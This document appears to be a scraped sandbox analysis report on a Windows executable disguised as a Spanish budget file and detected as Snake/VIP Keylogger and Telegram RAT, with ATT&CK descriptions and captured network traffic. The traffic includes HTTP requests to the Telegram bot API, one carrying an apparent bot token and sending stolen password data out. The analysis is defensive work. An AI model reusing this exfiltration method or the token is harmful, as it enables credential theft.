Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	5_2_05C10040
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1FAB9h	5_2_05C1F810
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1F661h	5_2_05C1F3B8
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1EDB1h	5_2_05C1EB08
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C10D0Dh	5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C11697h	5_2_05C10B30
Source: C:\Users\user\Desktop\PRESUPUESTO DE NOVIEMBRE...exe	Code function: 4x nop then jmp 05C1E501h	5_2_05C1E258

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.77 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:103386%0D%0ADate%20and%20Time:%2001/11/2024%20/%2001:21:53%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20103386%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7783218527:AAHN8_CA9nVnpNHtK0tB7lGdN14pvWhfSn8/sendDocument?chat_id=8178506397&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcfa7be7f62c54Host: api.telegram.orgContent-Length: 578

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PRESUPUESTO DE NOVIEMBRE...exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PRESUPUESTO DE NOVIEMBRE...exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

Windows Analysis Report
PRESUPUESTO DE NOVIEMBRE...exe

Function 0781D795 Relevance: 1.7, APIs: 1, Instructions: 246
processCOMMON

Function 0781D7A0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0150B33A Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 01504560 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 01505D0C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0781D511 Relevance: 1.6, APIs: 1, Instructions: 70
injectionCOMMON

Function 0781D518 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0781D378 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 0150B234 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Function 0150D820 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre